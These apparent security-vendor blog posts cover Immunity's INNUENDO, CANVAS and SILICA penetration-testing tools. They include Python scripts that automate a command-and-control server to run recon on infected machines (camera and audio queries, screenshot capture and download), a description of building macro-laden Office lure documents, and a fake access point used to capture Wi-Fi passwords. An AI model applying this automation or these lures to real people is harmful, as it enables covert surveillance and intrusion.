Friday, September 9, 2016

Leveraging INNUENDO's RPC for Fun and Profit: tagging

For the second installment of this series (see the previous here), we're going to take a look at the new tagging functionality that was added to INNUENDO 1.6.

It is now possible to tag both operations and processes, making it much more convenient to organize each in a wide variety of ways. All of this can be done from the INNUENDO Web UI, and you can see a demonstration of that in this video.

This post will demonstrate how you can use RPC to automatically add and remove tags based on the results of operations.

The first step is to set up an event stream, just as we did in the previous post.

>>> import pprint # to make it easier to look through results
>>> import rpc
>>> c = rpc.Client()
>>> for event in c.events():
...     pprint.pprint(event)
None
{'data': {'id': '...'},
 'name': 'machine_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 890128)}
{'data': {'id': '...'},
 'name': 'node_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 927102)}
{'data': {'id': '...'},
 'name': 'process_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 957477)}

This is a typical example of the output from an event stream. Note that it will occasionally return None, which we can safely ignore. For our purposes, the events we are interested in are operation_updated and process_added.

We can loop through the events and process them individually in a tree of if statements as in the previous post, but let's add a layer of abstraction to make life a bit easier.

import rpc

class Monitor(rpc.Client):
    def on_some_event(self, event):
        """Called when "some_event" is emitted."""
        pass


    def monitor(self):
        """Monitors events for any existing event handlers."""
        # create an event filter based on the existing handlers
        filter = [n[3:] for n in dir(self) if n.startswith('on_')]
        print 'monitoring: {}'.format(', '.join(filter))

        for event in self.events(*filter):
            if not event: continue
            handler = getattr(self, 'on_' + event['name'])
            handler(event)

This small subclass allows us to define event handler methods for events we're interested in, making it simple to add handlers for the events we're interested in. Now we can build off of that to begin processing events.

Let's add a handler to queue some operations every time a new process is added.

class Monitor(rpc.Client):
    # ... previous code ...
    def on_process_added(self, event):
        # all process events set event['data']['id'] to the relevant
        # process ID 
        proc_id = event['data']['id']
    
        # queue some recon operations
        self.operation_execute('recon', 'assign_aliases', proc_id)
        self.operation_execute('recon', 'audio_query', proc_id)
        self.operation_execute('recon', 'camera_query', proc_id)

That's all it takes. Those operations will be queued for execution with every new process that activates with the C2. This is nice, but it would be even better if we could process the results of those operations somehow.

One way to do that is to wait for the results to come in using
Client.operation_wait or Client.operation_call. However, by taking advantage of the event stream, we can process the results of every operation that is queued (even if queued in the Web UI), not just the ones we queue ourselves in the on_process_added handler.

So, let's add another handler to process operation results. For this event handler, we'll implement functionality similar to what is done in our monitor method to make it easy to process the results of different operations by adding handler methods.

class Monitor(rpc.Client):
    # ... previous code ...
    def on_operation_updated(self, event):
        # all operation events set event['data']['id'] to the relevant
        # operation ID
        oper_id = event['data']['id']
        # using the operation ID, we can retrieve the operation metadata
        oper = self.operation_get(oper_id)

        # and we can use the metadata to filter out operations that we're not
        # interested in. In this case, operations that are not finished
        if oper['state'] != 'finished':
            return

        # get operation attributes (these are the results)
        attrs = self.operation_attributes(oper['id'])

        # handle operation (if a matching 'handle_' method exists)
        handler = getattr(self, 'handle_' + oper['name'], None)
        if handler:
            # pass in both the operation metadata and attributes
            handler(oper, attrs)

Here, we're using a different method prefix (handle_) to define the methods that will handle operation results. Now we just have to add handlers for the operations we're interested in.

class Monitor(rpc.Client):
    # ... previous code ...
    def handle_assign_aliases(self, oper, attrs):
        # assign_aliases offers us a quick way to determine the target's
        # architecture, among other useful bits of info
        arch = attrs['info']['arch']

        # let's tag it!
        self.process_tag_add('arch:{}'.format(arch), oper)

    def handle_camera_query(self, oper, attrs):
        if attrs['cameras']:
            self.process_tag_add('has:camera', oper['id'])
        else:
            # a camera could be removed, so we should be able to update
            # the tag in that case
            self.process_tag_remove('has:camera', oper['id'])

    def handle_audio_query(self, oper, attrs):
        if attrs['devices']:
            self.process_tag_add('has:audio', oper['id'])
        else:
            # audio could be removed, so we should be able to update
            # the tag in that case
            self.process_tag_remove('has:audio', oper['id'])

How you tag your processes or operations is up to you, of course. We recommend a naming scheme that includes uniquely identifiable elements so the tags can be used to search for processes/operations.

Any added/removed tag will be reflected immediately in the Web UI.

Here is the full code.

import rpc

class Monitor(rpc.Client):
    ## operation result handlers ##

    def handle_assign_aliases(self, oper, attrs):
        arch = attrs['info']['arch']
        self.process_tag_add('arch:{}'.format(arch), oper['process_id'])

    def handle_camera_query(self, oper, attrs):
        if attrs['cameras']:
            self.process_tag_add('has:camera', oper['process_id'])
        else:
            self.process_tag_remove('has:camera', oper['process_id'])

    def handle_audio_query(self, oper, attrs):
        if attrs['devices']:
            self.process_tag_add('has:audio', oper['process_id'])
        else:
            self.process_tag_remove('has:audio', oper['process_id'])

    ## event handlers ##

    def on_process_added(self, event):
        proc_id = event['data']['id']
    
        # queue some recon operations
        self.operation_execute('recon', 'assign_aliases', proc_id)
        self.operation_execute('recon', 'audio_query', proc_id)
        self.operation_execute('recon', 'camera_query', proc_id)
    
    def on_operation_updated(self, event):
        oper_id = event['data']['id']
        oper = self.operation_get(oper_id)

        # filter
        if oper['state'] != 'finished':
            return

        # get operation attributes
        attrs = self.operation_attributes(oper['id'])

        # handle operation
        handler = getattr(self, 'handle_' + oper['name'], None)
        if handler:
            print 'handling operation:', oper['name']
            handler(oper, attrs)

    ## monitor ##

    def monitor(self):
        """Monitors events for any existing event handlers."""
        # create an event filter based on the existing handlers
        filter = [n[3:] for n in dir(self) if n.startswith('on_')]
        print 'monitoring: {}'.format(', '.join(filter))

        for event in self.events(*filter):
            if not event: continue
            print 'handling event:', event['name']
            handler = getattr(self, 'on_' + event['name'])
            handler(event)

if __name__ == '__main__':
    try:
        Monitor().monitor()
    except KeyboardInterrupt:
        pass

You can watch this script in action in the video mentioned at the top of this post.

Thursday, June 23, 2016

Wireless Penetration Testing: So easy anyone can do it!

My name is Lea Lewandowski and I am the newest member of the admin team at Immunity. I have a Bachelor of Science in Business Administration with a major in Marketing and a minor in Sociology and yes, even I can use SILICA. Prior to joining Immunity four weeks ago, I earned a living working at Starbucks for a year and a half, because like most college graduates, I did not have a full time career to jump right into. Then Immunity came along and decided to give me a shot at this thing called "real life work".  I can honestly say that I was not expecting to learn 'how to hack' during my second week at the company.

When I first heard that I was going to try to learn how to use SILICA I was pretty intimidated. Here I am, with no previous experience in computers or technology and I'm told to sit in front of this computer and get some passwords. Little did I know, this stuff is all automated. All I have to do is click some buttons. I swear, it is really that easy.  SILICA does all of the hard work for you, which makes the wireless penetration testing simple even for the non-techies of the world (like me!).

Ironically, my first SILICA lesson was at a Starbucks. We were there for less than half an hour and I was able to steal my own password from myself using the Fake AP (stands for Access Point, btw) feature. I also learned that I needed to fix the security settings on my iPhone. All I had to do was some clicky-clicky and then wait and, lo and behold, I got my password (which I have now changed).

Another feature that I learned how to use in a few minutes was the AP mapping tool. I was able to figure out how to use the AP mapping feature in the office and in my apartment. With this tool, I was able to find the exact location of AP's in both places. Pretty interesting stuff. Below is a picture of the AP mapping feature finding an AP in my apartment.
I didn't realize that I had to blur this out so you stalkers couldn't find my house! Learn something new everyday.
I created a map image of my apartment, imported it into the location capture tab, and walked around clicking different areas of the map. The outcome was a heat map of AP's around me. I found the AP in my apartment using the heat map, right clicked the AP for the signal strength and found exactly where the AP was located. The above image shows the signal strength at its highest because the SILICA was sitting right on top of the AP.

Although I'd love to sit here and tell you that I figured this all out because I'm some type of genius and a super fast learner but that isn't the case. My experiences with SILICA combined with my complete lack of any technical knowledge is proof that anyone can learn how to use SILICA. While awesome, it has definitely been an eye opening introduction to the security world.

Monday, May 23, 2016

The old Office Binder is back for more client-side funsies!



MS Office documents for targeted attacks: Re-Introducing CANVAS's Binderx module.

In targeted attacks, one of the most effective methods of compromising a remote computer is to send the victim a malicious Microsoft Office document with auto-executed VBA Macro. However,  MS Office Macros are not enabled by default and when a Macro-Embedded document is opened it will present a security warning stating that macros have been disabled and offering to “enable content”.   To achieve a successful exploitation the attacker must persuade the victim to click the button that will allow embedded Macro to run and compromise the system.  We will analyze some of the security warnings in the different MS Office versions.

VBA Macros and Ms Office's file formats

VBA Code or VBA Macros can be included in “legacy” binary formats such as .xls, .doc and .ppt
and in modern XML formatted documents like the Office Open XML file format (OOXML format) supported by MS Office 2007 and later. Documents, templates, worksheets, and presentations that you create in the MS Office 2007 release and later are saved with different file-name extensions with an “x” or an “m”.
For example, when you save a document in MS Word, the file now uses the .docx extension, instead of the .doc extension. 2007 release and later are saved with different file-name extensions with an “x” or an “m”.
For example, when you save a document in MS Word, the file now uses the .docx extension, instead of the .doc extension. To save a Macro-Embedded document you must save it as “Macro-Enabled Document” and the file-name extensions will be .docm (or .xlsm, .pptm, etc.). .

Illustration 1: Word Macro-Enabled documents in legacy format and OOXML format


Security Warnings in MS Office releases

VBA Macros are not enabled by default in MS Office versions. Hence the victim will see different warning messages.


MS Office 2007





MS Office 2010




MS Office 2016





In summary, the following table describes all messages produced when a Macro-Embedded file is opened. (Tested with legacy files and OOXML format files as well)



2007 2010 2013 2016
Security Warning Yes Yes Yes Yes
Security Alert Window Yes No No No


As we can see in the table above, in MS Office 2010 and higher versions there is no Security Alert Window. Of course, as we mentioned before, a successful exploitation relies on your social engineering skills to induce the victim to enable the macro execution.

Introducing Binderx module

CANVAS's Binderx module allows you to create an MS Office blank document with an embedded payload that will be executed using a VBA Macro.

Two types of document files can be created with the module: MS Word or MS Excel (using “legacy” format or OOXML format).

It is worth it to mention that MS Powerpoint does not include auto-execution Macro support like the ones available in MS Word and MS Excel.

Additionally, we added support to both Windows MOSDEF shellcode and PowerShell

Creating a legacy MS Word document with a PowerShell payload
Everyone loves a good shell!


Enjoy it! As always we appreciate any feedback from your experiences with these features during your penetration tests!

AnĂ­bal Irrera.

Wednesday, February 24, 2016

Leveraging INNUENDO's RPC for Fun and Profit: screengrab

INNUENDO 1.5 is on it's way, and along with a host of other great features, we've refined the RPC interface.

In this post I want to demonstrate how one can begin layering high-level automation on top of INNUENDO C2 operations using the RPC interface.

Let's start simple. All we want is a screenshot of the target machine every time a new implant process connects to the C2.

The first thing we need is access to the RPC client library. The RPC client can be found in the INNUENDO directory as "<innuendo>/innuendo_client.py". This file actually bundles all of the client dependencies within it, so the only requirement to use it is a Python (2.7) installation.

Once you've copied the client file to your local machine, you simply have to point it at the address and port of the C2 RPC server (and ensure that host/port is accessible, of course).

$ ./innuendo_client.py -u tcp://<c2-host>:9998 ping
ping?
pong!

You'll notice that you have full access to the command-line interface using this file, but we can get quite a bit more flexibility if we import it into Python.

>>> import innuendo_client

This first import bootstraps the environment, and gives us access to the RPC client and it's dependencies. Now, we can import the client library:

>>> from innuendo import rpc

Now, let's connect to the RPC server.

>>> c = rpc.Client('tcp://<c2-host>:9998')
>>> c.module_names()
('exploitmanager', 'recon', ...)

Excelsior! Let's watch some implants sync:

>>> for event in c.events('process'):
...     proc_id = event['data']['id']
...     proc = c.process_get(proc_id)
...     print proc['name'], proc['machine_alias']
netclassmon.exe Windows-7-x64-fuzzybunny
boot64.exe Windows-7-x64-wombat
rundll32.exe Windows-XP-x86-cabbage
boot64.exe Windows-7-x64-fuzzybunny
boot32.exe Windows-XP-x86-cabbage

NOTE: Here we are filtering for process events. If we wanted to grab all node events and any new machine events, we could call Client.events() like this instead: c.events('node', 'machine_added').

By reacting to this event stream, we can now begin to build a layer of automated decision-making on top of INNUENDO. A simple, but very useful option is to execute an operation or group of operations as soon as a new implant first syncs to the C2. Here's an example that takes a screenshot of the target as soon as an implant activates.

>>> for event in c.events('process_added'):
...     proc_id = event['data']['id']
...     c.operation_execute([proc_id], 'screengrab')

This snippet will queue a "recon.screengrab" operation on the C2 for every process that is added while the script is running. The GIF below shows us how it would look in INNUENDO's UI.



Let's take it a bit further and dump thumbnails of the screenshots into a local directory. The full source for catching the right events is below, but first let's just take a step-by-step look at grabbing operation results.

>>> import msgpack
>>> res = c.operation_attributes(oper_id)
>>> attrs = msgpack.unpackb(res)

Since operation attributes can potentially store large binary data, the RPC layer does not automatically deserialize them for you, so we do that with msgpack.

NOTE: msgpack is a serialization library. A pure-Python version is bundled with the client library, but if you need higher performance, you'll want to grab the full package off of PyPI, which includes a C implemention. The client will prefer an installed copy over the bundled copy.

>>> server_path = attrs['data'][0]['path']

This gives us the path of the screenshot image file on the C2 server. Index 0 is the first of potentially several images that could have been grabbed. Now we just have to ask the C2 for the file and save it locally.

>>> local_path = os.path.basename(remote_path)
>>> with open(local_path, 'w+b') as file:
...     for chunk in c.file_download(remote_path):
...         file.write(chunk)

This will stream the screenshot chunk-by-chunk to a file in the current directory. Let's put it all together!

import os

# bootstrap the client environment
import innuendo_client

import msgpack
from innuendo import rpc

def main():
    print 'waiting'
    
    c = rpc.Client()
    
    # track the operations we want to watch
    oper_ids = set()
    
    for event in c.events('process_added', 'operation_updated'):
        if not event:
            # the server will send out "heartbeat" events periodically
            # we can ignore them
            continue
        
        elif event['name'] == 'process_added':
            print 'process_added: taking screenshot'
            
            # grab the ID of the process that just activated
            proc_id = event['data']['id']
            
            # queue a screengrab operation and track it's ID
            res = c.operation_execute([proc_id], 'screengrab', wait=True)
            oper_ids.add(res[0])
            
            print 'operation_added:', res[0]
        
        elif event['name'] == 'operation_updated':
            # grab the ID of the operation that was just updated
            oper_id = event['data']['id']
            
            # make sure it's an operation we are tracking
            if oper_id not in oper_ids:
                continue
            
            # get the operation data so we can check it's state
            oper = c.operation_get(oper_id)
            print 'operation_updated:', oper['state']
            
            # wait until the operation is finished
            if oper['state'] != 'finished':
                continue
            oper_ids.remove(oper_id)
            
            # grab and unpack the operation's attributes
            res = c.operation_attributes(oper_id)
            attrs = msgpack.unpackb(res)
            
            # get the remote path of the first screenshot
            remote_path = attrs['data'][0]['path']
            local_path = os.path.basename(remote_path)
            
            # stream the screenshot to a local file
            with open(local_path, 'w+') as file:
                for chunk in c.file_download(remote_path):
                    file.write(chunk)
            print 'saved:', local_path

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        pass

With this script running, you should see a new screenshot saved to the current directory soon after every new implant process activates. This same procedure can be used to process results from any INNUENDO operation. Stay tuned for more!

Tuesday, February 9, 2016

SILICA NG

SILICA – Mapping access points (looking for Rogue APs)


We are happy to announce a new and exciting feature of SILICA that will be available with the 7.24 release (shortly!).

If you are in charge of protecting the wireless networks of a business, you often worry about rogue access points -  that is an AP that has been installed on your secure network without authorization.

SILICA's new AP Mapping is a feature that allows you to quickly and easily make a map of where the APs near you are placed. This feature not only is useful for finding rogue APs, but can also aid in detecting holes in wireless coverage, and also detect possible fake access points (access points external to the network that want to attack your wireless stations).

The user interface for the data entry part of this feature is simple. It consists of a map (or optionally you can just eyeball it on the blank canvas, which is what I always do) and buttons to control the beacon's capture and to determine the current location.

The user can record paths as he moves around the office, control the current wireless channel, view intermediate results, undo paths (useful after a miss-click on the map), and save the results to file. It takes about 30 seconds to figure out - after which you are merrily wandering your office with your SILICA laptop in hand mapping out every AP you can see.

You can make your maps in MS Paint or use Google Maps for high quality renditions. Or just start with a blank area (this still works).

The results section of this feature is rich in features. There are three basic map types that are produced, using the magic of math:

1) The Heatmap. This map is based on the estimated signal power of the access point that is most powerful in each location.




2) The AP Zones map. This map is based on what are the zones of influence of the more powerful access points. The zone of influence is the zone where one access point is the most powerful one.



3) The captured data map. This map show the signal power of access points in each location according to the beacon captures without interpolation or estimation. The user interface allows you to view this map for each access point, both for the average signal power and for the maximum signal power.



For the first two of the map types, the algorithm that SILICA uses to estimate the access points location and power are critical. There are various factors that influence the strength of the signal when received by the SILICA card: distance from the access point, obstacles that cause reflection or diffraction, relative angle of the AP's and SILICA's antennas, and interference from other sources. This means that the algorithm has to handle a very noisy signal, so we use a relatively simple algorithm to estimate the access point parameters - and also why it is best if you have more than just three or four points in your walk-path.

The first step is estimating the access point position, for this a number (at least 10) of the most powerful signals are averaged and the position and power are taken as the center of the signal.
To calculate the rate of power loss with the distance from the center, a linear approximation is used, using the least square regression method.

Finding out the zone of influence of each access point is more involved. A naive algorithm would be to calculate the estimated power for each access point and for each pixel of the map, and selecting the most powerful signal for each location, but this doesn't scale. What SIILCA uses is a divide-and-conquer method to find out the zones of each access point. This way, the graphs are quickly generated, even for high-resolution maps with many access points.

Example graph of how the map is divided in zones by the divide-and-conquer algorithm:


We hope everyone likes the new feature! More interesting updates are on the way, and if you want to ask questions about getting a SILICA, just email sales@immunityinc.com!